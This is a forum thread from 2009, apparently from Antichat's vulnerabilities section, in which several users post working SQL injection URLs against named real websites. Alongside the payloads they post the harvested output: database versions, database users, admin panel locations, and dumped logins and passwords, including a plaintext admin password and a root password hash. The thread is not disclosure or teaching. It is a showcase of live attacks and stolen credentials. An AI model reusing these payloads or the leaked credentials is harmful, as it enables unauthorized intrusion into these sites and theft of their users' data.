HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.04.2009, 00:45
BHYCHIK
Познающий
Регистрация: 30.01.2009
Сообщений: 64
Провел на форуме:
550208

Репутация: 94
По умолчанию

Скуля на http://www.radio-shalom.ca

Уязвимый скрипт.
http://www.radio-shalom.ca/showemission.php?ID=1015

Список пользователей и их паролей.
http://www.radio-shalom.ca/showemission.php?ID=1015+and+0+union+select+1,2,3, 4,5,6,7,8,9,concat_ws(0x3a,login,pass),11,12,13,14 +from+alex_livre_users_en+limit+0,1+--+

Database Version: 5.0.45
Database name: Main
User name: shalomcanada@treasure.inside.globat.com
Datadir: /data/mysqld1/
OS: redhat-linux-gnu
 
Ответить с цитированием

  #2  
Старый 24.04.2009, 00:58
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<СПРАВОЧНИК БИЗНЕС-ИНФО, КАЗАХСТАН.>>
Код:
http://www.1kz.biz/index.php?city=&cat=2&id=-20+union+select+1,2,3,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3--+
5.0.67-community-log-=*=-slvn_1kz-=*=-slvn_1kzbiz83@localhost-=*=-redhat-linux-gnu
 
Ответить с цитированием

  #3  
Старый 24.04.2009, 15:51
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


По умолчанию

www.democracymeansyou.com
Код:
http://www.democracymeansyou.com/articles/articlepf.php?ID=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--
version():4.0.18-standard
database():dmy_db1
user():kleinfei@localhost
 
Ответить с цитированием

  #4  
Старый 24.04.2009, 16:03
farex
Banned
Регистрация: 11.03.2009
Сообщений: 214
Провел на форуме:
914766

Репутация: 317
По умолчанию

<<Работа в Киеве>>
Код:
http://www.ukrwork.net/pers_rezume.php?id=-3510+union+select+1,concat_ws(0x2d3d2a3d2d,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6--
Код:
http://www.ukrwork.net/admin/login.php?accesscheck=%2Fadmin%2Findex.php
В админке моно слить и редоктировать всех пользователей....
5.0.51a-=*=-279_ukrworknet-=*=-adminukrwork_279@localhost-=*=-portbld-freebsd7.0
concat_ws(0x3a,login,pazzword) from users +limit+620,1
-=admin=-
log: admin
pass: qp173y
 
Ответить с цитированием

  #5  
Старый 24.04.2009, 16:04
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


По умолчанию

Код:
http://kapelan68.net/k.php?actionn=komentarz&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4
kapelan@localhost:kapelan:5.0.45-Debian_1ubuntu3.3-log

5.0.45-Debian_1ubuntu3.3-log
впервые такую версию вижу

Код:
http://www.musiklexikon.net/komponisten/k.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
musiklexikon@localhost:musiklexikon:5.0.45

Последний раз редактировалось mailbrush; 24.04.2009 в 16:13..
 
Ответить с цитированием

  #6  
Старый 24.04.2009, 16:59
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,version(),database(),user()),3
version():5.0.75-1
database():web22_db1
user():web22_u1@localhost
Код:
http://www.imklab.com/index.php?gl=articles&id=20+union+select+1,concat_ws(0x3a,id,login,pass),3+from+moderator
1:Andrey:0025308
2:Tarantul:htlfrnjh
 
Ответить с цитированием

  #7  
Старый 24.04.2009, 17:22
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
Провел на форуме:
4532332

Репутация: 1196


По умолчанию

1)
Код:
http://lisbon.pessoa.free.fr/places.php?id=-67+union+select+1,2,3,4,5--
version():5.0.67
database():lisbon_pessoa
user():lisbon.pessoa@172.20.245.45


2)
Код:
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,2,3,4--
version():5.1.31
database():ciudadredonda
user():ciudadredonda@localhost


Код:
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,table_name,3,4+from+information_schema.tables--
Код:
http://www.ciudadredonda.org/evento.php?id=-67+union+select+1,concat(0x3a,login,password),3,4+from+members--
admin312PQ/H/U6AVM
demodevFxxVFZsuos
 
Ответить с цитированием

  #8  
Старый 24.04.2009, 17:29
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию

Код:
http://www.uddannelsesnetvaerket.dk/events.php?mode=view&iEventID=228+union+select+1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11+limit+1,1/*
version():5.0.27
database():uddnet
user():uddnet@localhost
 
Ответить с цитированием

  #9  
Старый 24.04.2009, 18:12
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
По умолчанию

http://www.ccls.org/event.php?d=20090412&eventID=-4662+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,version(),78, 79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95 ,96,97,98,99,100,101,102,103,104,105,106,107,108,1 09,110,111,112,113,114,115,116,117,118,119,120,121 ,122,123,124,125,126,127,128,129,130--
4.1.22-standard
 
Ответить с цитированием

  #10  
Старый 24.04.2009, 18:59
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

Цитата:
http://www.nigfilmcorp.com/content.php?id=-7+union+select+1,2,3,4,5--
Database Version: 4.1.22-max-log
Database name: nfcadmin
User name: nfcadmin@64.202.163.150


Цитата:
http://www.everydaydish.tv/index.php?page=recipe&recipe=-1+union+select+1,2,3,4,5,6--
Database Version: 5.0.32-Debian_7etch8-log
Database name: everydaydish
User name: root@localhost

FILE_PRIV: Y

Login: root
Pass: *B747F2732BA6BOC2DD69A76241F18DAF52CA3777 (мб ошибся)


Админка:

http://www.everydaydish.tv/admin


Цитата:
http://www.lp33.tv/index.php?page=content&pid=-1+union+select+1,2,3,4--
Database Version: 5.0.51a-community-log
Database name: myawol
User name: myawol@www02.myawol.com

Вытаскивать из members
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.